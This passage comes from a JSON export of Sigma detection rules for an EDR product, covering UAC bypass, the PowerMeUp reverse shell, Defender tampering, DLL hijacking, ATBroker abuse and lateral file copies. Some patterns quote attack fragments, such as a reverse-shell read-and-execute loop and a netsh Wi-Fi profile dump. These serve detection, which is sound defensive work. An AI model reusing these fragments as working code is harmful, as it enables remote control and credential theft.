"content": "title: Slui UAC Bypass Prepared\nid: 9a663634-e603-4974-bddd-b20163a84296\ndescription: |\n Detects the preparation of the slui.exe UAC bypass, involving the setting of a registry key.\n Adversaries may bypass UAC mechanisms to elevate process privileges on system.\n Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\n It is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\nreferences:\n - https://github.com/bytecode77/slui-file-handler-hijack-privilege-escalation\ndate: 2020/10/26\nmodified: 2025/04/14\nauthor: HarfangLab\ntags:\n - attack.privilege_escalation\n - attack.t1548.002\n - attack.t1112\n - attack.t1546.001\n - classification.Windows.Source.Registry\n - classification.Windows.Behavior.UACBypass\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection_set_value:\n EventType: 'SetValue'\n TargetObject:\n - 'HKU\\\\*\\exefile\\shell\\open\\command\\(Default)'\n - 'HKU\\\\*\\exefile\\\\*SymbolicLinkValue'\n filter_is_empty:\n Details: '(Empty)'\n selection_rename:\n EventType:\n - 'RenameValue'\n - 'RenameKey'\n NewName: 'HKU\\\\*_Classes\\exefile\\\\*'\n exclusion_fp:\n # \"%1\" %*\n Details: '\"%1\" %?'\n condition: ((selection_set_value and not 1 of filter_*) or selection_rename) and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9a663634-e603-4974-bddd-b20163a84296",
"rule_name": "Slui UAC Bypass Prepared",
"rule_description": "Detects the preparation of the slui.exe UAC bypass, involving the setting of a registry key.\nAdversaries may bypass UAC mechanisms to elevate process privileges on a system.\nWindows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation.\nIt is recommended to analyze the process and user session responsible for the registry edit to look for malicious content or actions.\n",
"rule_creation_date": "2020-10-26",
"rule_modified_date": "2025-04-14",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1546.001",
"attack.t1548.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ae22815-47dd-4414-9497-a0c0d54a38ce",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.608779Z",
"creation_date": "2026-03-23T11:45:34.608783Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.608790Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/ItsCyberAli/PowerMeUp",
"https://attack.mitre.org/techniques/T1059/001/"
],
"name": "t1059_001_powermeup_powershell_tool.yml",
"content": "title: PowerMeUp PowerShell Script Execution\nid: 9ae22815-47dd-4414-9497-a0c0d54a38ce\ndescription: |\n Detects the usage of PowerMeUp, a PowerShell reverse shell that allows attackers to execute various commands as well as design custom post-exploitation scripts.\n Attackers may use reverse shells to bypass firewalls and security restrictions, establish a remote connection to a compromised system, and execute commands with elevated privileges.\n It is recommended to analyze the parent process as well as investigate actions taken by the reverse shell following this alert.\nreferences:\n - https://github.com/ItsCyberAli/PowerMeUp\n - https://attack.mitre.org/techniques/T1059/001/\ndate: 2022/10/26\nmodified: 2025/02/03\nauthor: HarfangLab\ntags:\n - attack.execution\n - attack.t1059.001\n - classification.Windows.Source.PowerShellEvent\n - classification.Windows.Script.PowerShell\n - classification.Windows.Framework.PowerMeUp\n - classification.Windows.Behavior.RemoteShell\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: powershell_event\n product: windows\ndetection:\n selection_main:\n PowershellCommand|contains|all:\n - '$RawData = $NetworkStream.Read($Buffer, 0, $Buffer.Length'\n - 'Invoke-Expression ($Code) 2>&1'\n - '$Buffer = New-Object System.Byte[] 1024'\n\n selection_bsod:\n PowershellCommand|contains: 'Write-Host \"[+]Sending BSOD to $env:COMPUTERNAME...\"'\n\n selection_disablemonitor:\n PowershellCommand|contains|all:\n - 'SendMessage('\n - '(IntPtr)0xffff, // HWND_BROADCAST'\n - '0x0112, // WM_SYSCOMMAND'\n - '(IntPtr)0xf170, // SC_MONITORPOWER'\n - '(IntPtr)0x0002 // POWER_OFF'\n\n selection_gps:\n PowershellCommand|contains: 'Write-host \"Retrieving geolocation for\" $($latitude) $($longitude)'\n\n selection_wifi:\n PowershellCommand|contains: 'netsh wlan show profiles | Select-String -Pattern \"(?<=^.+: ).+$\" | ForEach-Object -Process {'\n\n selection_scan:\n PowershellCommand|contains|all:\n - 
'Write-Host(\"`r`n[*] Running portscan on discovered hosts...\")'\n - 'Write-Host(\"`r`n[+]Port \" + $top1000[$port] + \" is open on $_!\")'\n\n selection_externalip:\n PowershellCommand|contains: '$StreamWriter.Write( (Invoke-RestMethod \"https://myexternalip.com/raw\" | Out-String) )'\n\n condition: 1 of selection_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9ae22815-47dd-4414-9497-a0c0d54a38ce",
"rule_name": "PowerMeUp PowerShell Script Execution",
"rule_description": "Detects the usage of PowerMeUp, a PowerShell reverse shell that allows attackers to execute various commands as well as design custom post-exploitation scripts.\nAttackers may use reverse shells to bypass firewalls and security restrictions, establish a remote connection to a compromised system, and execute commands with elevated privileges.\nIt is recommended to analyze the parent process as well as investigate actions taken by the reverse shell following this alert.\n",
"rule_creation_date": "2022-10-26",
"rule_modified_date": "2025-02-03",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.execution"
],
"rule_technique_tags": [
"attack.t1059.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9afca8ef-febf-42db-9ff5-b82567cb4c5b",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.072839Z",
"creation_date": "2026-03-23T11:45:34.072841Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.072845Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://github.com/es3n1n/no-defender",
"https://attack.mitre.org/techniques/T1562/001/"
],
"name": "t1562_001_defender_disabled_via_wsc_proxy.yml",
"content": "title: Windows Defender Disabled via wsc_proxy.exe\nid: 9afca8ef-febf-42db-9ff5-b82567cb4c5b\ndescription: |\n Detects execution of wsc_proxy.exe, a binary associated with the Avast and AVG antiviruses, from a suspicious location.\n This binary is a tool to communicate with the WSC (Windows Security Center) service.\n WSC is a service in Windows used by antiviruses to tell the operating system that another antivirus is running and that it should disable Windows Defender.\n Attackers may abuse this legitimate wsc_proxy.exe binary to disable Windows Defender on the host.\n It is recommended to look at the service that ran the wsc_proxy.exe binary to determine its legitimacy and to look for the execution of suspicious binaries before this alert which may be responsible for the creation of this service.\nreferences:\n - https://github.com/es3n1n/no-defender\n - https://attack.mitre.org/techniques/T1562/001/\ndate: 2024/05/24\nmodified: 2026/01/19\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1562.001\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Tool.WscProxy\n - classification.Windows.Behavior.ImpairDefenses\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n OriginalFileName: 'wsc_proxy.exe'\n Signed: 'true'\n Signature:\n - 'Avast Software s.r.o.'\n - 'AVG Technologies USA, LLC'\n\n filter_legitimate:\n Image:\n - '?:\\Program Files\\AVAST Software\\Avast\\wsc_proxy.exe'\n - '?:\\Program Files\\AVAST Software\\Avast Business\\wsc_proxy.exe'\n - '?:\\Program Files\\AVG\\Antivirus\\wsc_proxy.exe'\n - '?:\\Program Files\\Avast Software\\Suite\\wsc_proxy.exe'\n\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9afca8ef-febf-42db-9ff5-b82567cb4c5b",
"rule_name": "Windows Defender Disabled via wsc_proxy.exe",
"rule_description": "Detects execution of wsc_proxy.exe, a binary associated with the Avast and AVG antiviruses, from a suspicious location.\nThis binary is a tool to communicate with the WSC (Windows Security Center) service.\nWSC is a service in Windows used by antiviruses to tell the operating system that another antivirus is running and that it should disable Windows Defender.\nAttackers may abuse this legitimate wsc_proxy.exe binary to disable Windows Defender on the host.\nIt is recommended to look at the service that ran the wsc_proxy.exe binary to determine its legitimacy and to look for the execution of suspicious binaries before this alert which may be responsible for the creation of this service.\n",
"rule_creation_date": "2024-05-24",
"rule_modified_date": "2026-01-19",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1562.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9b1099db-e836-479a-bc60-dbbf9123fade",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "medium",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.079608Z",
"creation_date": "2026-03-23T11:45:34.079609Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.079614Z",
"rule_level": "medium",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://lolbas-project.github.io/lolbas/Binaries/Atbroker/",
"https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers",
"https://attack.mitre.org/techniques/T1218/"
],
"name": "t1218_atbroker_registry.yml",
"content": "title: Suspicious Registry Changes Related to ATBroker Proxy Execution\nid: 9b1099db-e836-479a-bc60-dbbf9123fade\ndescription: |\n Detects a registry change related to ATBroker, possibly to proxy execution of malicious code.\n ATBroker executes code defined in registry for a new Assistive Technology (AT). Modifications must be made to the system registry to either register or modify an existing AT service entry.\n Attackers can use this technique to execute malicious code through Microsoft-signed binaries.\n It is recommended to investigate the process that set the registry value for suspicious activities as well as to look for other suspicious actions stemming from an AtBroker process.\nreferences:\n - https://lolbas-project.github.io/lolbas/Binaries/Atbroker/\n - https://trustedsec.com/blog/hack-cessibility-when-dll-hijacks-meet-windows-helpers\n - https://attack.mitre.org/techniques/T1218/\ndate: 2022/12/08\nmodified: 2025/11/05\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.t1218\n - attack.t1112\n - classification.Windows.Source.Registry\n - classification.Windows.LOLBin.Atbroker\n - classification.Windows.Behavior.ProxyExecution\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: registry_event\ndetection:\n selection:\n EventType: SetValue\n TargetObject:\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\\\*\\StartExe'\n - 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\\\*\\ATExe'\n\n filter_legitimate_atexe:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\\\*\\ATExe'\n Details:\n - 'EoaExperiences.exe'\n - 'Magnify.exe'\n - 'Narrator.exe'\n - 'osk.exe'\n - 'sapisvr.exe'\n - 'VoiceAccess.exe'\n\n filter_legitimate_startexe:\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\\\*\\StartExe'\n Details:\n - 
'%SystemRoot%\\System32\\EoaExperiences.exe'\n - '%SystemRoot%\\System32\\Magnify.exe'\n - '%SystemRoot%\\System32\\Narrator.exe'\n - '%SystemRoot%\\System32\\osk.exe'\n - '%SystemRoot%\\speech\\common\\sapisvr.exe'\n - '?'\n - '??'\n\n filter_empty:\n Details:\n - '(Empty)'\n - ''\n\n exclusion_msiexec:\n - ProcessImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n Details|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ProcessParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n Details|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - ProcessParentImage:\n - '?:\\Windows\\System32\\msiexec.exe'\n - '?:\\Windows\\SysWOW64\\msiexec.exe'\n ProcessImage|startswith:\n - '?:\\Program Files\\'\n - '?:\\Program Files (x86)\\'\n - '?:\\Windows\\Installer\\MSI????.tmp'\n\n exclusion_oracle:\n - Details:\n - '?:\\Program Files\\Java\\j*\\bin\\jabswitch.exe'\n - '?:\\Program Files (x86)\\Java\\j*\\bin\\jabswitch.exe'\n - ProcessSigned: 'true'\n ProcessSignature: 'Oracle America, Inc.'\n - ProcessImage: '?:\\Windows\\System32\\msiexec.exe'\n TargetObject: 'HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Accessibility\\ATs\\Oracle_JavaAccessBridge\\StartExe'\n Details|endswith: '\\jabswitch.exe'\n\n exclusion_windeploy:\n ProcessCommandLine:\n - '?:\\$WINDOWS.~BT\\Sources\\SetupPlatform.exe /preoobe'\n - '?:\\Windows\\System32\\oobe\\Setup.exe'\n ProcessParentImage: '?:\\Windows\\System32\\oobe\\windeploy.exe'\n\n exclusion_nvda:\n ProcessProcessName: 'nvda_slave.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'NV Access Limited'\n\n condition: selection and not 1 of filter_* and not 1 of exclusion_*\nlevel: medium\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9b1099db-e836-479a-bc60-dbbf9123fade",
"rule_name": "Suspicious Registry Changes Related to ATBroker Proxy Execution",
"rule_description": "Detects a registry change related to ATBroker, possibly to proxy execution of malicious code.\nATBroker executes code defined in registry for a new Assistive Technology (AT). Modifications must be made to the system registry to either register or modify an existing AT service entry.\nAttackers can use this technique to execute malicious code through Microsoft-signed binaries.\nIt is recommended to investigate the process that set the registry value for suspicious activities as well as to look for other suspicious actions stemming from an AtBroker process.\n",
"rule_creation_date": "2022-12-08",
"rule_modified_date": "2025-11-05",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion"
],
"rule_technique_tags": [
"attack.t1112",
"attack.t1218"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9b1d8e53-2b21-4190-a2b0-6cab2f93d044",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.590428Z",
"creation_date": "2026-03-23T11:45:34.590431Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.590439Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows",
"https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/",
"https://attack.mitre.org/techniques/T1574/001/"
],
"name": "t1574_001_dll_hijacking_wpr.yml",
"content": "title: DLL Hijacking via wpr.exe\nid: 9b1d8e53-2b21-4190-a2b0-6cab2f93d044\ndescription: |\n Detects potential Windows DLL Hijacking via wpr.exe.\n DLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\n Attackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\n It is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\nreferences:\n - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n - https://redcanary.com/blog/hijack-my-hijack-my-hijack-my-dll/\n - https://attack.mitre.org/techniques/T1574/001/\ndate: 2021/12/10\nmodified: 2025/07/11\nauthor: HarfangLab\ntags:\n - attack.defense_evasion\n - attack.persistence\n - attack.privilege_escalation\n - attack.t1574.001\n - classification.Windows.Source.LibraryLoaded\n - classification.Windows.Behavior.DLLHijacking\n - classification.Windows.Behavior.DefenseEvasion\nlogsource:\n product: windows\n category: library_event\ndetection:\n selection:\n ProcessOriginalFileName: 'wpr.exe'\n ProcessSignature: 'Microsoft Windows'\n ImageLoaded|endswith: '\\WindowsPerformanceRecorderControl.dll'\n filter_legitimate_image:\n Image|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_legitimate_imageloaded:\n ImageLoaded|startswith:\n - '?:\\Windows\\System32\\'\n - '?:\\Windows\\SysWOW64\\'\n - '?:\\Windows\\WinSxS\\'\n filter_signature_imageloaded:\n Signed: 'true'\n Signature: 'Microsoft Windows'\n condition: selection and not 1 of filter_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9b1d8e53-2b21-4190-a2b0-6cab2f93d044",
"rule_name": "DLL Hijacking via wpr.exe",
"rule_description": "Detects potential Windows DLL Hijacking via wpr.exe.\nDLL hijacking takes advantage of the default Windows search order by positioning both a victim application and a malicious DLL alongside each other.\nAttackers use this technique by copying a legitimate Windows-signed executable from System32 or SysWOW64 to a non-standard directory and planting the malicious DLL in the same folder.\nIt is recommended to investigate the loaded library for malicious content and the behavior of the loading process to identify any suspicious activity.\n",
"rule_creation_date": "2021-12-10",
"rule_modified_date": "2025-07-11",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.defense_evasion",
"attack.persistence",
"attack.privilege_escalation"
],
"rule_technique_tags": [
"attack.t1574.001"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9b59b325-f5e2-4124-98bd-81e4a9c066a8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.603928Z",
"creation_date": "2026-03-23T11:45:34.603931Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.603939Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling",
"https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/",
"https://attack.mitre.org/techniques/T1219/002/"
],
"name": "t1219_002_screenconnect_process_execution.yml",
"content": "title: Process Executed via ScreenConnect\nid: 9b59b325-f5e2-4124-98bd-81e4a9c066a8\ndescription: |\n Detects the execution of a process through ScreenConnect, a legitimate remote access tool.\n Attackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\n It is recommended to investigate the process to determine its legitimacy.\nreferences:\n - https://www.huntandhackett.com/blog/revil-the-usage-of-legitimate-remote-admin-tooling\n - https://dfirtnt.wordpress.com/2023/07/14/rmm-screenconnect-client-side-evidence/\n - https://attack.mitre.org/techniques/T1219/002/\ndate: 2023/11/10\nmodified: 2025/06/27\nauthor: HarfangLab\ntags:\n - attack.command_and_control\n - attack.t1219.002\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.RMM.ScreenConnect\n - classification.Windows.Behavior.CommandAndControl\n - classification.Windows.Behavior.InitialAccess\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection:\n ParentCommandLine|contains: '\\ScreenConnect.WindowsClient.exe RunFile '\n\n condition: selection\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9b59b325-f5e2-4124-98bd-81e4a9c066a8",
"rule_name": "Process Executed via ScreenConnect",
"rule_description": "Detects the execution of a process through ScreenConnect, a legitimate remote access tool.\nAttackers can maliciously use remote access software to establish an interactive command and control channel to target systems within networks.\nIt is recommended to investigate the process to determine its legitimacy.\n",
"rule_creation_date": "2023-11-10",
"rule_modified_date": "2025-06-27",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control"
],
"rule_technique_tags": [
"attack.t1219.002"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9b676aee-d3a6-4f3e-9ee4-8b7f3c9bfdb8",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.076614Z",
"creation_date": "2026-03-23T11:45:34.076616Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.076620Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf",
"https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf",
"https://attack.mitre.org/techniques/T1105/",
"https://attack.mitre.org/techniques/T1570/"
],
"name": "t1570_file_move_admin_share.yml",
"content": "title: Suspicious File Copy to an Administrative Share\nid: 9b676aee-d3a6-4f3e-9ee4-8b7f3c9bfdb8\ndescription: |\n Detects file copies to a default hidden SMB administrative share (C$, ADMIN$ and IPC$).\n This technique can be used by attackers to copy malicious programs to another machine as a means of moving laterally.\n It is recommended to analyze the process responsible for moving the files and the files themselves, to determine if they contain malicious tools or indicators.\nreferences:\n - https://www.bitdefender.com/files/News/CaseStudies/study/421/Bitdefender-PR-Whitepaper-IndEs-creat6269-en-EN.pdf\n - https://www.fox-it.com/media/kadlze5c/201912_report_operation_wocao.pdf\n - https://attack.mitre.org/techniques/T1105/\n - https://attack.mitre.org/techniques/T1570/\ndate: 2023/02/22\nmodified: 2025/04/15\nauthor: HarfangLab\ntags:\n - attack.lateral_movement\n - attack.t1570\n - attack.command_and_control\n - attack.t1105\n - classification.Windows.Source.ProcessCreation\n - classification.Windows.Behavior.Lateralization\n - classification.Windows.Behavior.CommandAndControl\nlogsource:\n category: process_creation\n product: windows\ndetection:\n selection_bin:\n - Image|endswith:\n - '\\xcopy.exe'\n - '\\robocopy.exe'\n # Renamed binaries\n - OriginalFileName:\n - 'xcopy.exe'\n - 'robocopy.exe'\n\n selection_cmdline:\n # Shell primitive, no image.\n CommandLine|contains:\n - ' copy '\n - ' move '\n - ' mv '\n\n selection_smb_share:\n CommandLine|contains:\n # C$ share is the C drive.\n - '\\\\\\\\*\\C$\\Windows'\n - '\\\\\\\\*\\C$\\Users'\n # ADMIN$ share is the %SystemRoot% directory.\n - '\\\\\\\\*\\ADMIN$\\'\n # IPC$ is a share to expose named pipes. 
A copy to this should be suspicious in itself.\n - '\\\\\\\\*\\IPC$'\n\n exclusion_xpertwin:\n CommandLine|startswith: 'xcopy.exe ????$\\Windows\\xpertwin.ini'\n\n exclusion_netlogon_logs:\n CommandLine|startswith: 'xcopy *\\c$\\windows\\debug\\netlogon.\\**'\n\n exclusion_logs:\n CommandLine|endswith: '.log' # Log files ending with \".log\" extension\n\n exclusion_reader:\n # Avoid false positive with filename that match \"selection_cmdline\"\n Image:\n - '?:\\Program Files (x86)\\Adobe\\Acrobat Reader DC\\Reader\\AcroRd32.exe'\n - '?:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\EXCEL.EXE'\n\n exclusion_teracopy:\n Image: '?:\\Program Files\\TeraCopy\\TeraCopy.exe'\n\n exclusion_robocopy:\n ProcessOriginalFileName: 'robocopy.exe'\n ProcessSigned: 'true'\n ProcessSignature: 'Microsoft Windows'\n\n condition: (selection_bin or selection_cmdline) and selection_smb_share and not 1 of exclusion_*\nlevel: high\nconfidence: strong\n",
"block_on_agent": false,
"quarantine_on_agent": false,
"rule_level_override": null,
"rule_id": "9b676aee-d3a6-4f3e-9ee4-8b7f3c9bfdb8",
"rule_name": "Suspicious File Copy to an Administrative Share",
"rule_description": "Detects file copies to a default hidden SMB administrative share (C$, ADMIN$ and IPC$).\nThis technique can be used by attackers to copy malicious programs to another machine as a means of moving laterally.\nIt is recommended to analyze the process responsible for moving the files and the files themselves, to determine if they contain malicious tools or indicators.\n",
"rule_creation_date": "2023-02-22",
"rule_modified_date": "2025-04-15",
"rule_os": "windows",
"rule_status": null,
"rule_tactic_tags": [
"attack.command_and_control",
"attack.lateral_movement"
],
"rule_technique_tags": [
"attack.t1105",
"attack.t1570"
],
"warnings": null,
"errors": null,
"declared_in": null,
"source": "0950c540-b155-4054-9b93-8fb2888de6ed"
}
{
"id": "9ba2245e-e5dd-4b2a-9413-0bc8080755cf",
"test_maturity_current_count": 0,
"test_maturity_delay": 7,
"test_maturity_threshold": 10,
"global_state": "alert",
"effective_state": "alert",
"rule_effective_level": "high",
"rule_effective_confidence": "strong",
"alert_count": 0,
"source_id": "0950c540-b155-4054-9b93-8fb2888de6ed",
"rule_level_overridden": false,
"whitelist_count": 0,
"last_modifier": {
"id": 1,
"username": "system_supervisor"
},
"endpoint_detection": true,
"backend_detection": false,
"origin_stack": {
"id": "b8e2fe4fc90e4d08",
"name": null,
"is_current": false,
"is_supervisor": true,
"is_tenant": false
},
"tenant": "b8e2fe4fc90e4d08",
"rule_is_depended_on": [],
"rule_type": "sigma_rule",
"origin_stack_id": "b8e2fe4fc90e4d08",
"last_update": "2026-03-23T11:45:34.089741Z",
"creation_date": "2026-03-23T11:45:34.089744Z",
"enabled": true,
"hl_status": "stable",
"hl_testing_start_time": "2026-03-23T11:45:34.089748Z",
"rule_level": "high",
"rule_confidence": "strong",
"rule_confidence_override": null,
"references": [
"https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview#to-install-a-module-using-appcmdexe",
"https://learn.microsoft.com/en-us/iis/configuration/system.webserver/globalmodules/add#appcmdexe",
